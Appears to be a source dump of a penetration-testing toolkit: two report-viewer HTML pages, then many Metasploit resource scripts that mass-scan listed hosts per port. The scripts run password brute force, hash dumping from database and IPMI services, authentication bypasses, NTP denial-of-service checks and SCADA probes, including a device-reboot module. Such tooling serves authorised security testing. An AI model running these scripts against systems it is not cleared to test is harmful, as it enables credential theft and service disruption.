 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="active dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>Files <span class="inc-icon inc-icon-angle-right"></span> Text</h1>
 97 |     </div>
 98 |     <div class="embed-responsive embed-responsive-16by9">
 99 |         <iframe src="../data/txt.htm" class="embed-responsive-item"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/xls.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="active dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>Files <span class="inc-icon inc-icon-angle-right"></span> Excel</h1>
 97 |     </div>
 98 |     <div class="embed-responsive embed-responsive-16by9">
 99 |         <iframe src="../data/xls.htm" class="embed-responsive-item"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/resource/1099-rmi.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1099
 4 | 
 5 | use auxiliary/scanner/misc/java_rmi_server
 6 | run
 7 | 
 8 | use auxiliary/scanner/misc/java_jmx_server
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/110-pop3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 110
4 | 
5 | use auxiliary/scanner/pop3/pop3_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/111-rpc.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 111
 4 | 
 5 | use auxiliary/scanner/misc/sunrpc_portmapper
 6 | run
 7 | 
 8 | use auxiliary/scanner/nfs/nfsmount
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/1158-oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1158
 4 | 
 5 | use auxiliary/scanner/oracle/emc_sid
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/spy_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/123-udp-ntp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 123
 4 | 
 5 | use auxiliary/scanner/ntp/ntp_monlist
 6 | run
 7 | 
 8 | use auxiliary/scanner/ntp/ntp_nak_to_the_future
 9 | run
10 | 
11 | use auxiliary/scanner/ntp/ntp_peer_list_dos
12 | run
13 | 
14 | use auxiliary/scanner/ntp/ntp_peer_list_sum_dos
15 | run
16 | 
17 | use auxiliary/scanner/ntp/ntp_readvar
18 | run
19 | 
20 | use auxiliary/scanner/ntp/ntp_req_nonce_dos
21 | run
22 | 
23 | use auxiliary/scanner/ntp/ntp_reslist_dos
24 | run
25 | 
26 | use auxiliary/scanner/ntp/ntp_unsettrap_dos
27 | run
28 | 


--------------------------------------------------------------------------------
/resource/13364-rosewill.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 13364
4 | 
5 | use auxiliary/scanner/misc/rosewill_rxs3211_passwords
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/135-dcerpc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 135
4 | 
5 | use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/137-udp-netbios.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 137
4 | 
5 | use auxiliary/scanner/netbios/nbname
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/1414-ibm-mq.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1414
4 | 
5 | use auxiliary/scanner/misc/ibm_mq_enum
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/143-imap.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 143
4 | 
5 | use auxiliary/scanner/imap/imap_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/1433-mssql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1433
 4 | 
 5 | use scanner/mssql/mssql_ping
 6 | run
 7 | 
 8 | use scanner/mssql/mssql_login
 9 | set PASS-FILE /usr/share/wordlists/fasttrack.txt
10 | run
11 | 
12 | use scanner/mssql/mssql_hashdump
13 | run
14 | 
15 | use scanner/mssql/mssql_schemadump
16 | run
17 | 


--------------------------------------------------------------------------------
/resource/1521-oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1521
 4 | 
 5 | use auxiliary/scanner/oracle/tnslsnr_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/oracle_hashdump
 9 | run
10 | 
11 | use auxiliary/scanner/oracle/oracle_login
12 | run
13 | 
14 | use auxiliary/scanner/oracle/sid_brute
15 | run
16 | 
17 | use auxiliary/scanner/oracle/sid_enum
18 | run
19 | 
20 | use auxiliary/scanner/oracle/tnspoison_checker
21 | run
22 | 


--------------------------------------------------------------------------------
/resource/1604-udp-citrix.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1604
 4 | 
 5 | use gather/citrix_published_applications
 6 | run
 7 | 
 8 | use gather/citrix_published_bruteforce
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/161-udp-snmp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 161
 4 | 
 5 | use auxiliary/scanner/misc/oki_scanner
 6 | run
 7 | 
 8 | use auxiliary/scanner/snmp/aix_version
 9 | run
10 | 
11 | use auxiliary/scanner/snmp/arris_dg950
12 | run
13 | 
14 | use auxiliary/scanner/snmp/brocade_enumhash
15 | run
16 | 
17 | use auxiliary/scanner/snmp/cisco_config_tftp
18 | run
19 | 
20 | use auxiliary/scanner/snmp/cisco_upload_file
21 | echo "Hello world!" > /tmp/test.txt
22 | set SOURCE /tmp/test.txt
23 | run
24 | 
25 | use auxiliary/scanner/snmp/cnpilot_r_snmp_loot
26 | run
27 | 
28 | use auxiliary/scanner/snmp/epmp1000_snmp_loot
29 | run
30 | 
31 | use auxiliary/scanner/snmp/netopia_enum
32 | run
33 | 
34 | use auxiliary/scanner/snmp/sbg6580_enum
35 | run
36 | 
37 | use auxiliary/scanner/snmp/snmp_enum
38 | run
39 | 
40 | use auxiliary/scanner/snmp/snmp_enumshares
41 | run
42 | 
43 | use auxiliary/scanner/snmp/snmp_enumusers
44 | run
45 | 
46 | use auxiliary/scanner/snmp/snmp_login
47 | run
48 | 
49 | use auxiliary/scanner/snmp/ubee_ddw3611
50 | run
51 | 
52 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers
53 | run
54 | 


--------------------------------------------------------------------------------
/resource/17185-udp-vxworks.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 17185
 4 | 
 5 | use auxiliary/scanner/vxworks/wdbrpc_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/vxworks/wdbrpc_bootline
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/1720-h323.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1720
4 | 
5 | use auxiliary/scanner/h323/h323_version
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/19-chargen.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 19
4 | 
5 | use auxiliary/scanner/chargen/chargen_probe
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/1900-udp-upnp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1900
 4 | 
 5 | use auxiliary/scanner/upnp/ssdp_amp
 6 | run
 7 | 
 8 | use auxiliary/scanner/upnp/ssdp_msearch
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/20256-unitronics.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 20256
4 | 
5 | use auxiliary/scanner/scada/pcomclient
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/2049-nfs.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 2049
4 | 
5 | use auxiliary/scanner/nfs/nfsmount
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/21-ftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 21
 4 | 
 5 | use auxiliary/scanner/ftp/ftp_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/ftp/anonymous
 9 | run
10 | 
11 | use auxiliary/scanner/ftp/bison_ftp_traversal
12 | run
13 | 
14 | use auxiliary/scanner/ftp/colorado_ftp_traversal
15 | run
16 | 
17 | use auxiliary/scanner/ftp/easy_file_sharing_ftp
18 | run
19 | 
20 | use auxiliary/scanner/ftp/konica_ftp_traversal
21 | run
22 | 
23 | use auxiliary/scanner/ftp/pcman_ftp_traversal
24 | run
25 | 
26 | use auxiliary/scanner/ftp/titanftp_xcrc_traversal
27 | run
28 | 


--------------------------------------------------------------------------------
/resource/22-ssh.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 22
 4 | 
 5 | use auxiliary/scanner/ssh/ssh_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/ssh/detect_kippo
 9 | run
10 | 
11 | use auxiliary/scanner/ssh/eaton_xpert_backdoor
12 | run
13 | 
14 | use auxiliary/scanner/ssh/fortinet_backdoor
15 | run
16 | 
17 | use auxiliary/scanner/ssh/juniper_backdoor
18 | run
19 | 
20 | use auxiliary/scanner/ssh/libssh_auth_bypass
21 | run
22 | 


--------------------------------------------------------------------------------
/resource/23-telnet.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 23
 4 | 
 5 | use auxiliary/scanner/telnet/telnet_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/telnet/telnet_encrypt_overflow
 9 | run
10 | 
11 | use auxiliary/scanner/telnet/telnet_ruggedcom
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/2362-udp-scada.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 2362
 4 | 
 5 | use auxiliary/scanner/scada/digi_addp_reboot
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/digi_addp_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/25-smtp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 25
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_enum
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_ntlm_domain
12 | run
13 | 
14 | use auxiliary/scanner/smtp/smtp_relay
15 | run
16 | 


--------------------------------------------------------------------------------
/resource/28784-scada.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 28784
4 | 
5 | use auxiliary/scanner/scada/koyo_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/3000-emc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3000
4 | 
5 | use auxiliary/admin/emc/alphastor_devicemanager
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/3050-borland.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3050
4 | 
5 | use auxiliary/scanner/misc/ib_service_mgr_info
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/30718-telnet.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 30718
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_password
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/3306-mysql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 3306
 4 | 
 5 | use auxiliary/scanner/mysql/mysql_version
 6 | run
 7 | 
 8 | use scanner/mysql/mysql_authbypass_hashdump
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/3310-clamav.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3310
4 | 
5 | use auxiliary/scanner/misc/clamav_control
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/3389-rdp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 3389
 4 | 
 5 | use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
 6 | run
 7 | 
 8 | use auxiliary/scanner/rdp/ms12_020_check
 9 | run
10 | 
11 | use auxiliary/scanner/rdp/rdp_scanner
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/3500-emc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3500
4 | 
5 | use auxiliary/admin/emc/alphastor_librarymanager
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/37777-dahua-dvr.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 37777
4 | 
5 | use auxiliary/scanner/misc/dahua_dvr_auth_bypass
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/407-udp-motorola.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 407
4 | 
5 | use auxiliary/scanner/motorola/timbuktu_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/443-vmware.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 443
4 | 
5 | use auxiliary/scanner/vmware/esx_fingerprint
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/445-smb.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 445
 4 | 
 5 | use auxiliary/scanner/dcerpc/petitpotam
 6 | run
 7 | 
 8 | use auxiliary/scanner/smb/pipe_auditor
 9 | run
10 | 
11 | use auxiliary/scanner/smb/pipe_dcerpc_auditor
12 | run
13 | 
14 | use auxiliary/scanner/smb/psexec_loggedin_users
15 | run
16 | 
17 | use auxiliary/scanner/smb/smb_enum_gpp
18 | run
19 | 
20 | use auxiliary/scanner/smb/smb_enumshares
21 | run
22 | 
23 | use auxiliary/scanner/smb/smb_enumusers
24 | run
25 | 
26 | use auxiliary/scanner/smb/smb_enumusers_domain
27 | run
28 | 
29 | use auxiliary/scanner/smb/smb_login
30 | run
31 | 
32 | use auxiliary/scanner/smb/smb_lookupsid
33 | set MaxRID 1025
34 | run
35 | 
36 | use auxiliary/scanner/smb/smb_ms17_010
37 | run
38 | 
39 | use auxiliary/scanner/smb/smb_uninit_cred
40 | run
41 | 
42 | use auxiliary/scanner/smb/smb_version
43 | run
44 | 


--------------------------------------------------------------------------------
/resource/465-smtp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 465
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_ntlm_domain
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_relay
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/46824-scada.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 46824
4 | 
5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/4786-cisco-smart-install.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 4786
4 | 
5 | use auxiliary/scanner/misc/cisco_smart_install
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/4800-udp-moxa.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 4800
4 | 
5 | use auxiliary/scanner/scada/moxa_discover
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5000-satel.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5000
4 | 
5 | use auxiliary/scanner/telnet/satel_cmd_exec
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/50000-db2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 50000
 4 | 
 5 | use auxiliary/scanner/db2/db2_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/db2/db2_auth
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/502-scada.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 502
 4 | 
 5 | use auxiliary/scanner/scada/modbusclient
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/modbusdetect
 9 | run
10 | 
11 | use auxiliary/scanner/scada/modbus_banner_grabbing
12 | run
13 | 
14 | use auxiliary/scanner/scada/modbus_findunitid
15 | run
16 | 


--------------------------------------------------------------------------------
/resource/5040-dcerpc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5040
4 | 
5 | use auxiliary/scanner/dcerpc/windows_deployment_services
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5060-sip.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator_tcp
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options_tcp
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/5060-udp-sip.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/512-rexec.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 512
4 | 
5 | use auxiliary/scanner/rservices/rexec_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/513-rlogin.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 513
4 | 
5 | use auxiliary/scanner/rservices/rlogin_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/514-rshell.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 514
4 | 
5 | use auxiliary/scanner/rservices/rsh_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/523-udp-db2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 523
4 | 
5 | use auxiliary/scanner/db2/discovery
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5432-postgres.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5432
 4 | 
 5 | use auxiliary/scanner/postgres/postgres_version
 6 | run
 7 | 
 8 | use auxiliary/scanner/postgres/postgres_login
 9 | run
10 | 
11 | use auxiliary/scanner/postgres/postgres_hashdump
12 | run
13 | 
14 | use auxiliary/scanner/postgres/postgres_dbname_flag_injection
15 | run
16 | 
17 | use auxiliary/scanner/postgres/postgres_schemadump
18 | run
19 | 


--------------------------------------------------------------------------------
/resource/548-afp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 548
4 | 
5 | use auxiliary/scanner/afp/afp_server_info
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5560-oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5560
 4 | 
 5 | use auxiliary/scanner/oracle/isqlplus_login
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/isqlplus_sidbrute
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/5631-pcanywhere.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5631
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_tcp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5632-pcanywhere.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5632
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5900-vnc.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5900
 4 | 
 5 | use auxiliary/scanner/vnc/ard_root_pw
 6 | run
 7 | 
 8 | use auxiliary/scanner/vnc/vnc_login
 9 | run
10 | 
11 | use auxiliary/scanner/vnc/vnc_none_auth
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/5920-cctv.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5920
4 | 
5 | use auxiliary/scanner/misc/cctv_dvr_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5984-couchdb.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5984
4 | 
5 | use auxiliary/scanner/couchdb/couchdb_login
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/5985-winrm.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5985
4 | 
5 | use auxiliary/scanner/winrm/winrm_auth_methods
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/6000-5-x11.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | 
 4 | use auxiliary/scanner/x11/open_x11
 5 | set RPORT 6000
 6 | run
 7 | 
 8 | use auxiliary/scanner/x11/open_x11
 9 | set RPORT 6001
10 | run
11 | 
12 | use auxiliary/scanner/x11/open_x11
13 | set RPORT 6002
14 | run
15 | 
16 | use auxiliary/scanner/x11/open_x11
17 | set RPORT 6003
18 | run
19 | 
20 | use auxiliary/scanner/x11/open_x11
21 | set RPORT 6004
22 | run
23 | 
24 | use auxiliary/scanner/x11/open_x11
25 | set RPORT 6005
26 | run
27 | 


--------------------------------------------------------------------------------
/resource/623-udp-ipmi.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 623
 4 | 
 5 | use auxiliary/scanner/ipmi/ipmi_cipher_zero
 6 | run
 7 | 
 8 | use auxiliary/scanner/ipmi/ipmi_version
 9 | run
10 | 
11 | use auxiliary/scanner/ipmi/ipmi_dumphashes
12 | run
13 | 


--------------------------------------------------------------------------------
/resource/6379-redis.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 6379
4 | 
5 | auxiliary/scanner/redis/redis_server
6 | run
7 | 


--------------------------------------------------------------------------------
/resource/69-tftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 69
 4 | 
 5 | use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
 6 | run
 7 | 
 8 | use auxiliary/scanner/tftp/netdecision_tftp
 9 | run
10 | 


--------------------------------------------------------------------------------
/resource/771-scada.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 771
 4 | 
 5 | use auxiliary/scanner/scada/digi_realport_serialport_scan
 6 | run
 7 | 
